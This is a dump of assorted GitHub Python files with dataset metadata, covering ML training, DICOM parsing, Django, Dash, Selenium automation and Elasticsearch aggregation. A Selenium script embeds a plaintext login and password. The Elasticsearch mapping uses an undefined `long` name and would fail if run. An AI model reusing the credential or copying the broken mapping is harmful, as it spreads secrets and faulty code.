in_content:\n\t\t\t\tout_file.write(line)\n\tif sys.argv[1] == '-r': # replace the argv[3]th line of argv[2] with argv[4] \n\t\tchangedIndex = int(sys.argv[3]) - 1\n\t\twith open(sys.argv[2], 'r') as in_file: # Read a dimacs file\n\t\t\tin_content = in_file.readlines()\n\t\tos.remove(sys.argv[2])\n\t\twith open(sys.argv[2], 'w') as out_file:\n\t\t\tfor i in range(len(in_content)):\n\t\t\t\tif i != changedIndex:\n\t\t\t\t\tout_file.write(in_content[i])\n\t\t\t\telse:\n\t\t\t\t\tout_file.write(sys.argv[4] + \"\\n\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"anwu1219/summer2016","sub_path":"myProgram/python/bashControl.py","file_name":"bashControl.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30829279240","text":"from typing import Any\n\nfrom m.core import Bad, Good, Res, issue, one_of\nfrom m.log import EnvVars\nfrom pydantic import BaseModel\n\nfrom .config import Config, Workflow\nfrom .git_env import GitEnv\n\n\nclass ReleaseEnv(BaseModel):\n \"\"\"Object to store the release configuration.\"\"\"\n\n build_tag: str\n python_tag: str\n is_release: bool\n is_release_pr: bool\n is_hotfix_pr: bool\n workflow: Workflow\n\n\ndef _verify_version(\n config: Config,\n git_env: GitEnv,\n gh_latest: str,\n is_release_pr: bool,\n is_release: bool,\n) -> Res[int]:\n if config.workflow in {Workflow.git_flow, Workflow.m_flow}:\n if config.uses_git_flow():\n pr_branch = git_env.get_pr_branch()\n flow = config.git_flow\n prefixes = (flow.release_prefix, flow.hotfix_prefix)\n # Skip verification when release or hotfix are going to develop\n if git_env.target_branch == flow.develop_branch:\n if pr_branch.startswith(prefixes):\n return Good(0)\n return config.verify_version(\n gh_latest,\n is_release_pr=is_release_pr,\n is_release=is_release,\n )\n # Covers Workflow.free_flow\n return Good(0)\n\n\ndef _get_develop_branch(config: Config) -> str:\n if config.uses_git_flow():\n return config.git_flow.develop_branch\n return 'develop'\n\n\ndef _extra_checks(\n config: Config,\n git_env: GitEnv,\n is_release_pr: bool,\n is_hotfix_pr: bool,\n) -> Res[Any]:\n # If successful we return None, we do not care about the value thus we\n # are specifying `Any` so that a Bad value may be compatible with other\n # `OneOf`s.\n master_branch = config.get_master_branch()\n develop_branch = _get_develop_branch(config)\n valid_branches = (\n (master_branch,)\n if config.uses_m_flow()\n else (master_branch, develop_branch)\n )\n release_pr = is_release_pr or is_hotfix_pr\n if release_pr and git_env.target_branch not in valid_branches:\n error_type = 'release' if is_release_pr else 'hotfix'\n return issue(f'invalid {error_type}-pr', context={\n 'expected_target_branch': master_branch,\n 'current_target_branch': git_env.target_branch,\n 'workflow': str(config.workflow),\n })\n return Good(None)\n\n\ndef get_release_env(\n config: Config,\n env_vars: EnvVars,\n git_env: GitEnv,\n) -> Res[ReleaseEnv]:\n \"\"\"Provide the release environment information.\n\n Args:\n config: The m configuration.\n env_vars: The environment variables.\n git_env: The git environment.\n\n Returns:\n A `ReleaseEnv` instance.\n \"\"\"\n is_release = git_env.is_release(config)\n is_release_pr = git_env.is_release_pr(config)\n is_hotfix_pr = git_env.is_hotfix_pr(config)\n gh_latest = git_env.release.tag_name if git_env.release else ''\n if not config.uses_free_flow():\n check_result = _extra_checks(\n config,\n git_env,\n is_release_pr=is_release_pr,\n is_hotfix_pr=is_hotfix_pr,\n )\n if isinstance(check_result, Bad):\n return check_result\n return one_of(lambda: [\n ReleaseEnv(\n build_tag=build_tag,\n python_tag=python_tag,\n is_release=is_release,\n is_release_pr=is_release_pr,\n is_hotfix_pr=is_hotfix_pr,\n workflow=config.workflow,\n )\n for _ in _verify_version(\n config,\n git_env,\n gh_latest,\n is_release_pr=is_release_pr or is_hotfix_pr,\n is_release=is_release,\n )\n for build_tag in git_env.get_build_tag(config, env_vars.run_id)\n for python_tag in git_env.get_py_tag(config, env_vars.run_id)\n ])\n","repo_name":"jmlopez-rod/m","sub_path":"packages/python/m/ci/release_env.py","file_name":"release_env.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"1126291247","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 30 19:55:21 2018\r\n\r\n@author: Helena\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\n\r\n# Get Data\r\nwith np.load('./notMNIST.npz') as data :\r\n Data, Target = data [\"images\"], data[\"labels\"]\r\n np.random.seed(521)\r\n randIndx = np.arange(len(Data))\r\n np.random.shuffle(randIndx)\r\n Data = Data[randIndx]/255.\r\n Target = Target[randIndx]\r\n trainData, trainTarget = Data[:15000], Target[:15000]\r\n validData, validTarget = Data[15000:16000], Target[15000:16000]\r\n testData, testTarget = Data[16000:], Target[16000:]\r\n# one-hot \r\ntrainZeros=np.zeros((15000, 10))\r\ntrainZeros[np.arange(15000),trainTarget]=1\r\ntrainTarget = trainZeros\r\nvalidZeros=np.zeros((1000, 10))\r\nvalidZeros[np.arange(1000),validTarget]=1\r\nvalidTarget = validZeros\r\ntestZeros=np.zeros((2724, 10))\r\ntestZeros[np.arange(2724),testTarget]=1\r\ntestTarget = testZeros\r\n\r\n# Extract batch_size batches randomly \r\ndef grab_batches(trainData, trainTarget, batch_size):\r\n batch_indices = np.random.permutation(range(15000)).reshape(-1, batch_size)\r\n X_batches = trainData.reshape(-1, n_dim)[batch_indices]\r\n y_batches = trainTarget[batch_indices]\r\n batches = zip(X_batches, y_batches)\r\n return batches\r\n \r\n# Hyperparam\r\nlearning_rate = 0.005\r\nn_epochs = 25\r\nbatch_size = 500\r\nweight_decays=[0]\r\ndrop = 0\r\n \r\n# Setup training \r\nn_dim = 28*28\r\nX = tf.placeholder(tf.float32,[None,n_dim])\r\nY = tf.placeholder(tf.float32,[None,10])\r\n# layer 1\r\ninitializer = tf.contrib.layers.xavier_initializer(uniform=False)\r\nW1 = tf.Variable(initializer([X.shape[1].value, 1000]), name='weights')\r\nb1 = tf.Variable(tf.zeros(1000), name='biases') \r\nS1 = tf.add(tf.matmul(X, W1), b1)\r\n# layer 2\r\nX2 = tf.nn.relu(S1)\r\ninitializer = tf.contrib.layers.xavier_initializer(uniform=False)\r\nW2 = tf.Variable(initializer([X2.shape[1].value, 10]), name='weights')\r\nb2 = tf.Variable(tf.zeros(10), name='biases')\r\nif drop:\r\n X_drop = tf.nn.dropout(X2, keep_prob=0.5) \r\nelse:\r\n X_drop = X2\r\ny_ = tf.add(tf.matmul(X_drop, W2), b2)\r\n\r\nloss_drop = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=Y, logits=y_))\r\n#regularizer = tf.nn.l2_loss(W)\r\n#loss = tf.reduce_mean(loss + weight_decay * regularizer)\r\n\r\nprediction = tf.cast(tf.round(tf.argmax(y_,1)), tf.int8)\r\nequality = tf.equal(prediction, tf.cast(tf.argmax(Y,1), tf.int8))\r\naccuracy = tf.reduce_mean(tf.cast(equality, tf.float32))\r\n\r\ntraining_step = tf.train.AdamOptimizer(learning_rate).minimize(loss_drop)\r\ninit = tf.global_variables_initializer()\r\n \r\n# Training\r\nvalid_accuracies = []\r\ntrain_accuracies = []\r\n#test_accuracies = []\r\nwith tf.Session() as sess:\r\n for wd in weight_decays:\r\n sess.run(init)\r\n print(\"Weight Decay: {} \\n\".format(wd))\r\n for epoch in range(1,n_epochs+1):\r\n batches = grab_batches(trainData, trainTarget, batch_size)\r\n for X_batch, y_batch in batches:\r\n sess.run(training_step, feed_dict={X: X_batch, Y: y_batch})\r\n # Evaluate losses (without dropout)\r\n feed_dict ={X: trainData.reshape(-1,n_dim), Y: trainTarget}\r\n train_accuracy = sess.run(accuracy, feed_dict)\r\n print(\"Epoch: {}, Accuracy: {}\".format(epoch, train_accuracy))\r\n train_accuracies.append(train_accuracy)\r\n valid_accuracy = sess.run(accuracy,feed_dict = {X: validData.reshape(-1,n_dim), Y: validTarget})\r\n valid_accuracies.append(valid_accuracy)\r\n# test_accuracy = sess.run(accuracy, feed_dict = {X: testData.reshape(-1,n_dim), Y: testTarget})\r\n# test_accuracies.append(test_accuracy)\r\n \r\n # Plots\r\n plt.figure(figsize=(10,10))\r\n plt.title('Accuracies for training and validation')\r\n plt.scatter(np.arange(n_epochs), train_accuracies, marker='x', color='r', label = 'training')\r\n plt.scatter(np.arange(n_epochs), valid_accuracies, marker='d', color='b', label = 'validation')\r\n #plt.scatter(np.arange(n_epochs), test_accuracies, marker='o', color='g', label = 'testing')\r\n plt.legend(loc='upper right') \r\n plt.xlabel('Epoch')\r\n plt.ylabel('Accuracy')\r\n plt.grid(True)\r\n plt.show()\r\n \r\n # Visualize weights\r\n sample_num=100 \r\n shuffled_idx = np.random.permutation(1000)\r\n scale=255/sess.run(tf.reduce_max(tf.abs(W1)))\r\n for ii in range(0,sample_num):\r\n weight_array=tf.reshape(W1[:,shuffled_idx[ii]],[28,28])\r\n img = Image.fromarray(scale*sess.run(weight_array)).convert('L')\r\n arr = np.asarray(img)\r\n plt.subplot(10,10,ii+1).axis('off')\r\n plt.imshow(arr, cmap='gray')\r\n #print(sess.run(W1))\r\n \r\n \r\n \r\n \r\n","repo_name":"fncode246/ECE521","sub_path":"Assignment3/Part1.3.py","file_name":"Part1.3.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"71553930133","text":"from setuptools import setup\n\nimport os\nimport shutil\n\n# Copy the krb5.conf file into the source tree if necessary\n_this_dir = os.path.abspath(os.path.dirname(os.path.relpath(__file__)))\nkrb5_conf = os.path.join(_this_dir, 'images', 'hadoop-testing-kerberos',\n 'files', 'etc', 'krb5.conf')\nkrb5_target = os.path.join(_this_dir, 'hadoop_test_cluster', 'krb5.conf')\nif os.path.exists(krb5_conf):\n shutil.copyfile(krb5_conf, krb5_target)\n\n\nsetup(name='hadoop-test-cluster',\n version='0.1.0',\n url=\"https://github.com/jcrist/hadoop-test-cluster\",\n maintainer='Jim Crist-Harif',\n maintainer_email='jcristharif@gmail.com',\n license='BSD',\n description='A CLI for managing hadoop clusters for testing',\n long_description=open('README.rst').read(),\n packages=['hadoop_test_cluster'],\n package_data={'hadoop_test_cluster': ['docker-compose.yaml',\n 'krb5.conf']},\n entry_points='''\n [console_scripts]\n htcluster=hadoop_test_cluster.cli:main\n ''',\n zip_safe=False)\n","repo_name":"jcrist/hadoop-test-cluster","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"67"} +{"seq_id":"6523900049","text":"\"\"\"\nA collection of functions to extended core components that can be reused\nacross apps.\n\n\nAdding the follow new components\n\n* Extended core Silder to include a label\n* Extended core Dropdown to include a label\n* A formated Upload box\n\"\"\"\n\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\ndef _merge(a, b):\n return dict(a, **b)\n\n\ndef _omit(omitted_keys, d):\n return {k: v for k, v in d.items() if k not in omitted_keys}\n\n\ndef NamedSlider(name='', **kwargs):\n return html.Div(\n style={'padding': '10px 10px 15px 4px'},\n children=[\n html.P(f'{name}:'),\n html.Div(dcc.Slider(**kwargs), style={'margin-left': '6px'})\n ]\n )\n\n\ndef NamedDropdown(name='', **kwargs):\n return html.Div([\n html.P(f'{name}:', style={'margin-left': '3px'}),\n dcc.Dropdown(**kwargs)\n ])\n\n\n\"\"\"\nRequires Bootstrap for styling\n\"\"\"\ndef Upload_Box(id='upload',\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n}):\n return html.Div(className='row', children=[\n html.Div(className='col-md-12', children=[\n dcc.Upload(\n id='upload',\n children=html.Div([\n 'Drag and Drop or ',\n html.A('Select a File'),\n ' to change data'\n ]),\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n }\n )\n ])\n ])","repo_name":"jlondal/base_dash_app","sub_path":"regression_explorer/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26201954759","text":"import sys\n\nimport pydicom\n\n\ndef extract_plan_setupbeam_isocenter(_ds: pydicom.Dataset) -> list[str]:\n \"\"\"Extracts the isocenter from the first beam in the plan\n\n Args:\n ds (pydicom.Dataset): dataset representing the plan\n\n Returns:\n list[str]: the isocenter in the first beam\n \"\"\"\n plan_setup_iso = []\n plan_setup_iso = _ds.IonBeamSequence[0].IonControlPointSequence[0].IsocenterPosition\n if len(plan_setup_iso) == 0:\n raise ValueError(\"No isocenter in first beam of plan\")\n\n return plan_setup_iso\n\n\nif __name__ == \"__main__\":\n PLAN_PATH = sys.argv[1]\n # print(path)\n plan_ds = pydicom.dcmread(PLAN_PATH, force=True)\n plan_iso = extract_plan_setupbeam_isocenter(plan_ds)\n print(plan_iso)\n","repo_name":"sjswerdloff/rtregistrationcalc","sub_path":"extract_plan_setupbeam_isocenter.py","file_name":"extract_plan_setupbeam_isocenter.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"11109354612","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom django.core.management.base import BaseCommand\nfrom services.reminder import Reminder\nfrom ...utils import load_config\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n\n parser.add_argument(\n '--max', '-m',\n action='store',\n dest='max',\n type=int,\n default=0,\n help='Max count to fetch.',\n )\n\n parser.add_argument(\n '--test', '-e',\n action='store_true',\n dest='test',\n default=False,\n help='If test specified, will only fetch tester users.',\n )\n\n parser.add_argument(\n '--config-file', '-f',\n action='store',\n type=str,\n dest='config_file',\n default='config.ini',\n help='Specify a config file. Default is config.ini',\n )\n\n def handle(self, *args, **options):\n reminder = Reminder()\n reminder.start()\n\n","repo_name":"samuelchen/twido","sub_path":"twido/management/commands/remind.py","file_name":"remind.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"71538233494","text":"import csv\r\nfrom datetime import datetime\r\nfrom matplotlib import pyplot as plt\r\n\r\nfilename = 'data/sitka_weather_2018_simple.csv'\r\nwith open(filename) as f:\r\n reader = csv.reader(f)\r\n header_row = next(reader)\r\n\r\n # for index, column_header in enumerate(header_row):\r\n # print(index, column_header)\r\n\r\n dates, prcps = [], []\r\n for row in reader:\r\n current_date = datetime.strptime(row[2], '%Y-%m-%d')\r\n dates.append(current_date)\r\n prcp = float(row[3])\r\n prcps.append(prcp)\r\n\r\nplt.style.use('seaborn')\r\nfig, ax = plt.subplots()\r\nax.plot(dates, prcps, c='blue')\r\n\r\nplt.title(\"Daily Precipitation - 2018\", fontsize=24)\r\nplt.xlabel('', fontsize=16)\r\nfig.autofmt_xdate()\r\nplt.ylabel(\"Inches of Rain\", fontsize=16)\r\nplt.tick_params(axis='both', which='major', labelsize=16)\r\n\r\nplt.show()\r\n","repo_name":"MParnin/PythonCrashCourse","sub_path":"Project 02 - Data Visualization/16-1.py","file_name":"16-1.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37088831228","text":"\nfrom selenium import webdriver\n# import chromedriver_autoinstaller\n# chromedriver_autoinstaller.install()\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nPROJECT_NAME = 'Nave_Image_30cls'\n\n# Start registering\ns=Service('./chromedriver')\n# s = Service()\nbrowser = webdriver.Chrome(service=s)\nurl='http://127.0.0.1:8080/user/login/'\nbrowser.get(url)\nuserid = browser.find_element(By.ID, 'email')\npwd = browser.find_element(By.ID, 'password')\nbtn = browser.find_element(By.CLASS_NAME,'ls-button_look_primary')\nuserid.send_keys(\"1@qq.com\")\npwd.send_keys(\"deng@199451\")\nbtn.click()\ntime.sleep(1)\n# try:\nprojcts = browser.find_elements(By.CSS_SELECTOR, '.ls-projects-page__link')\nfor pjt in projcts:\n div = pjt.find_element(By.CSS_SELECTOR, '.ls-project-card__title-text')\n if div.text == PROJECT_NAME:\n pjt.click()\n break\ntime.sleep(2)\n\nbody = browser.find_element(By.CSS_SELECTOR, '.dm-table__virual')\ndata_id = set()\n# data = browser.find_elements(By.CSS_SELECTOR, '.dm-table-row')\ndata = browser.find_elements(By.XPATH,'//div[@class=\"dm-table-row dm-table-row\"]/div[2]')\nfor row in data:\n data_id.add(row.text)\ntemp_height = 0\nwhile True:\n browser.execute_script(f\"arguments[0].scrollBy(0,1000);\", body)\n check_height = browser.execute_script(\"return arguments[0].scrollTop;\", body)\n if check_height == temp_height:\n break\n data = browser.find_elements(By.XPATH,'//div[@class=\"dm-table-row dm-table-row\"]/div[2]')\n for row in data:\n data_id.add(row.text)\n temp_height = check_height\n print('page down', check_height)\n temp_height=check_height\n time.sleep(0.2) #delay\n\nfor id in sorted(list(data_id)):\n print(id)\n # browser.get(f'http://127.0.0.1:8080/projects/24/data?tab=19&task={id}')\n # time.sleep(0.5)\n\nbrowser.quit()","repo_name":"dengbuqi/label-studio-api-tool","sub_path":"rollprediction.py","file_name":"rollprediction.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14012131060","text":"from django.shortcuts import render\nfrom django.urls import reverse\n\nfrom misago.categories.serializers import CategoryWithPosterSerializer \\\n as CategorySerializer\nfrom misago.categories.utils import get_categories_tree\n\nfrom userprofiles.decorators import (active_login_required,\n valid_account_required)\n\n\n@active_login_required\n@valid_account_required\ndef categories(request):\n categories_tree = get_categories_tree(request.user, join_posters=True)\n\n request.frontend_context.update({\n 'CATEGORIES': CategorySerializer(\n categories_tree, many=True, context={'request': request}).data,\n 'CATEGORIES_API': reverse('misago:api:category-list'),\n })\n for category in categories_tree:\n for subcategory in category.subcategories:\n subcategory.subscription = False\n return render(request, 'misago/categories/list.html', {\n 'categories': categories_tree,\n })\n","repo_name":"go2people/misago","sub_path":"misago/categories/views/categorieslist.py","file_name":"categorieslist.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25211841078","text":"import numpy as np\nimport pandas as pd\nimport datetime # Auxilia nos logs\nimport GPUtil # Vê a utilização da GPU\nfrom threading import Thread # Abre uma Thread para o Monitor\nimport time # Vê o tempo que o Monitor está rodando\nimport os\nfrom sklearn.model_selection import StratifiedKFold\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n# Camadas: Densa, Pooling Médio\nfrom tensorflow.keras.layers import Dense, GlobalAveragePooling2D\nfrom tensorflow.keras.models import Model # Classe Model\nfrom tensorflow.keras.applications.xception import Xception # Xception\n# Pré-processamento da Xception\nfrom tensorflow.keras.applications.xception import preprocess_input\n# Para melhor observar os logs, utiliza-se o TensorBoard\nfrom tensorflow.keras.callbacks import TensorBoard\n\n'''\n LEMBRETES\n Cheque se a base de dados onde o cross validation irá operar é a PathoSpotter 80-20.\n Cheque se os arquivos 'training_labels.csv' e 'testing_labels.csv' existem na mesma pasta que o script.\n Cheque se o modelo que está fazendo fine tuning realmente está na mesma pasta que o script.\n Para salvar os dados de data augmentation numa pasta, a pasta data_aug deve ser criada.\n'''\n# ---------------------------Classe Monitor------------------------------\n\n\nclass Monitor(Thread):\n def __init__(self, delay):\n super(Monitor, self).__init__()\n self.stopped = False\n self.delay = delay # Time between calls to GPUtil\n self.start()\n\n def run(self):\n while not self.stopped:\n GPUtil.showUtilization()\n time.sleep(self.delay)\n\n def stop(self):\n self.stopped = True\n\n# ------------------------Dados de Configuração--------------------------\n\n\n# Onde se deve buscar as imagens para o treino\ntrain_image_dir = 'PathoSpotter/train/'\ntest_image_dir = 'PathoSpotter/validation/'\nnum_epochs = 2 # Número de Épocas\nn = 1582 # Número de imagens que você vai dar ao algoritmo\nmodel_path = 'model_4.h5' # Modelo de onde o classificador será extraído\n\n# --------------------------Criação de Modelo----------------------------\n\n\ndef create_new_model():\n # Carrega os pesos do modelo para uma variável auxiliar\n load_aux = tf.keras.models.load_model(model_path)\n # Instancia um modelo com os pesos da auxiliar e camada de saída indicada\n load_model = Model(inputs=load_aux.inputs, outputs=load_aux.outputs)\n # Cria o modelo base, pré-treinado da imagenet\n base_model = Xception(weights='imagenet', include_top=False,\n input_shape=(299, 299, 3), pooling='avg')\n # Descongelando o modelo base\n base_model.trainable = True\n # Congela as camadas da Xception que não o último bloco convolucional\n for layer in range(len(base_model.layers)-8):\n base_model.layers[layer].trainable = False\n # Busca o input do modelo base\n x = base_model(base_model.input)\n # Adiciona o classificador treinado ao modelo\n outputs = load_model.get_layer('dense')(x)\n model = Model(inputs=base_model.input, outputs=outputs)\n #model.summary()\n return model\n\n# ------------------------Preparação dos K-Folds-------------------------\n\n\n# Leitura dos dados de treino de um CSV com os caminhos\ntrain_data = pd.read_csv('training_labels.csv')\ntest_data = pd.read_csv('testing_labels.csv')\n# Pega as classes do CSV\nY = train_data[['label']]\n\n# Instancio um \"Stratified\" K-Fold, que garante sempre o mesmo percentual de amostras de cada classe\n# Número de folds: 4, shuffle as imagens de ordem com seed 7\nskf = StratifiedKFold(n_splits=4, random_state=7, shuffle=True)\n\n# --------------------------Data Augmentation----------------------------\n\n# Instancio um Gerador que gera lotes de dados de imagem de tensor com data augmentation em tempo real\n# Faixa de graus para rotações aleatórias: 20º; às vezes, vira a imagem horizontalmente; também\n# pré-processa a imagem de acordo com os resquisitos da Xception\nidg = ImageDataGenerator(rotation_range=20,\n horizontal_flip=True,\n fill_mode='nearest',\n preprocessing_function=preprocess_input)\n\n# --------------------------Cross Validation-----------------------------\n\n# Função auxiliar que retorna o nome do modelo de acordo com seu fold\n\n\ndef get_model_name(k):\n return 'model_'+str(k)+'.h5'\n\n\n# Métricas de desempenho dos K folds\nVALIDATION_ACCURACY = []\nVALIDATION_LOSS = []\nfold_var = 1 # Contador do fold\n\n# As variáveis train_index e val_index são matrizes com os índices\n# que a função cross_validation.StratifiedKFold montou\nfor train_index, val_index in skf.split(np.zeros(len(Y)), Y):\n # Criar modelos em um loop faz com que o estado global consuma uma quantidade cada\n # vez maior de memória ao longo do tempo. Chamar esse método libera o estado global.\n tf.keras.backend.clear_session()\n #print(\"Loop \",fold_var)\n\n # Função do pandas que aloca os dados presentes no index de treino\n training_data = train_data.iloc[train_index]\n # Função do pandas que aloca os dados presentes no index de validação\n validation_data = train_data.iloc[val_index]\n\n # Pega os dados que foram indicados a serem utilizados nesse fold\n # do diretório das imagens. Nome dos arquivos estão na coluna filename\n # enquanto aqueles da classe vão para a coluna \"label\". A previsão retornará\n # rótulos 2D codificados, graças ao \"categorical\". Ele tira as fotos de ordem.\n train_data_generator = idg.flow_from_dataframe(dataframe=training_data,\n directory=train_image_dir,\n x_col=\"filename\",\n y_col=\"label\",\n batch_size=23,\n seed=42,\n class_mode=\"categorical\",\n shuffle=True)\n valid_data_generator = idg.flow_from_dataframe(dataframe=validation_data,\n directory=train_image_dir,\n x_col=\"filename\",\n y_col=\"label\",\n batch_size=32,\n seed=42,\n class_mode=\"categorical\",\n shuffle=True)\n test_generator = idg.flow_from_dataframe(dataframe=test_data,\n directory=test_image_dir,\n x_col=\"filename\",\n y_col=\"label\",\n batch_size=11,\n seed=42,\n class_mode=\"categorical\",\n shuffle=True)\n\n # ---------------------------Fine Tuning-----------------------------\n\n # Criação de um novo modelo com a função create_new_model definida\n model = create_new_model()\n\n # Compilação do novo modelo, com o otimizador RMSprop\n opt = tf.keras.optimizers.RMSprop(learning_rate=0.0005)\n model.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=[tf.keras.metrics.Accuracy(),\n tf.keras.metrics.CategoricalAccuracy(),\n tf.keras.metrics.AUC(),\n tf.keras.metrics.Precision(),\n tf.keras.metrics.Recall(),\n tf.keras.metrics.FalsePositives(),\n tf.keras.metrics.FalseNegatives()])\n\n # Criação dos callbacks\n # Faz com que o TensorBoard tenha acesso aos dados de treinamento para visualização\n log_dir = \"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = TensorBoard(log_dir=log_dir, histogram_freq=0)\n # Cria a lista de callbacks com o TensorBoard\n callbacks_list = [tensorboard_callback]\n\n # Mostra a situação da GPU\n #monitor = Monitor(30)\n \n ''' Experimento de treino com pesos abandonado.\n # Pesos de classes\n weight_dict = {0:24.20, # Endocapillary\n 1:12.17, # Endomesangial\n 2:4.78, # Membranous\n 3:9.15, # Mesangial\n 4:3.11, # Normal\n 5:4.78} # Sclerosis\n '''\n # Treinamento da nova rede neural\n history = model.fit(x=train_data_generator,\n batch_size=32,\n steps_per_epoch=train_data_generator.n//train_data_generator.batch_size,\n epochs=num_epochs,\n callbacks=callbacks_list,\n #class_weight=weight_dict, # Experimento de treino com pesos abandonado.\n validation_data=valid_data_generator,\n validation_steps=valid_data_generator.n//valid_data_generator.batch_size)\n #print(\"Acabou o treinamento.\")\n # Desaloca o Monitor\n # monitor.stop()\n # Salva o modelo para que tenha-se acesso posteriormente\n file_path = get_model_name(fold_var)\n model.save(file_path)\n \n # -----------------------Avaliação do Modelo-------------------------\n \n # Calcula os passos para o experimento de teste\n test_spe = np.math.ceil(test_generator.samples/test_generator.batch_size)\n # Avalia o modelo nos exemplos de teste\n results = model.evaluate(x=test_generator,\n steps=test_spe,\n callbacks=callbacks_list)\n # Guarda os resultados\n results = dict(zip(model.metrics_names, results))\n # Coloca os resultados no histórico\n VALIDATION_ACCURACY.append(results['accuracy'])\n VALIDATION_LOSS.append(results['loss'])\n\n fold_var += 1\n\nwith open('K-Fold_performance.txt', 'w') as f:\n for acc in VALIDATION_ACCURACY:\n f.write(\"Accuracy: %s\\n\" % acc)\n for loss in VALIDATION_LOSS:\n f.write(\"Loss: %s\\n\" % loss)\nf.close","repo_name":"ozenilsoncruz/ic-ozenilson-2021","sub_path":"ic-ellen/PathoSpotter-Search-dev/cross_val-fine_tuning.py","file_name":"cross_val-fine_tuning.py","file_ext":"py","file_size_in_byte":10336,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19953461290","text":"import sys\r\nimport json\r\nimport yaml\r\nimport datetime\r\nimport time\r\nimport requests\r\nimport elasticsearch\r\nimport regex\r\nimport threading\r\n\r\nimport logging\r\nimport logging.config\r\n\r\nfrom pprint import pprint\r\n\r\n\r\n###\r\nlog_config = {\r\n 'disable_existing_loggers': True,\r\n 'version': 1,\r\n 'formatters': {\r\n 'short': {\r\n 'format': '%(asctime)s %(levelname)s %(name)s: %(message)s'\r\n },\r\n },\r\n 'handlers': {\r\n 'console': {\r\n 'level': 'INFO',\r\n 'formatter': 'short',\r\n 'class': 'logging.StreamHandler',\r\n },\r\n },\r\n 'loggers': {\r\n '': {\r\n 'handlers': ['console'],\r\n 'level': 'INFO',\r\n }\r\n }\r\n}\r\n\r\nlogging.config.dictConfig(log_config)\r\n\r\n\r\n# Elasticsearch Shard stats index creation:\r\n\"\"\"\r\nPUT test_status_count_summary\r\n{\r\n \"mappings\": {\r\n \"doc\": {\r\n \"dynamic\": \"false\",\r\n \"properties\": {\r\n \"status\": {\"type\": \"keyword\" },\r\n \"@timestamp\": {\"type\": \"date\" },\r\n \"interval\": {\"type\": \"keyword\" },\r\n \"doc_count\": {\"type\": long },\r\n \"doc_count_total\": {\"type\": long },\r\n \"beat.name\": {\"type\": \"keyword\" },\r\n \"pipeline.kafka_topic_id\": {\"type\": \"keyword\" },\r\n \"pipeline.egress.hostname\": {\"type\": \"keyword\" },\r\n \"pipeline.ingress.hostname\": {\"type\": \"keyword\" },\r\n \"fields.team\": {\"type\": \"keyword\" }\r\n }\r\n }\r\n }\r\n}\r\n\"\"\"\r\n\r\nindex_mappings = {\r\n \"mappings\": {\r\n \"doc\": {\r\n \"dynamic\": \"false\",\r\n \"properties\": {\r\n \"status\": {\"type\": \"keyword\" },\r\n \"@timestamp\": {\"type\": \"date\" },\r\n \"interval\": {\"type\": \"keyword\" },\r\n \"doc_count\": {\"type\": long },\r\n \"doc_count_total\": {\"type\": long },\r\n }\r\n }\r\n }\r\n}\r\n\r\nagg_keys = [\r\n 'beat.name', 'pipeline.kafka_topic_id',\r\n 'pipeline.egress.hostname', 'pipeline.ingress.hostname',\r\n 'fields.team']\r\n\r\ninterval_names = {\r\n '1m': 60,\r\n '5m': (60 * 5),\r\n '15m': (60 * 15),\r\n '1h': (60 * 60),\r\n '24h': (60 * 60 * 24),\r\n '1d': (60 * 60 * 24)\r\n}\r\n\r\n# The reindexing is intended to produce a list of documents primarily\r\n# indexed by status, and then secondarily by the various sub-buckets\r\n# ?should this def be called reindex or flatten?\r\ndef reindex_aggregation(agg_response):\r\n\r\n logger = logging.getLogger(__name__)\r\n if (agg_response['timed_out']):\r\n logger.error(\"Timeout found in aggregation response\")\r\n return None\r\n\r\n try:\r\n status_buckets = agg_response['aggregations']['status']['buckets']\r\n except KeyError as e:\r\n 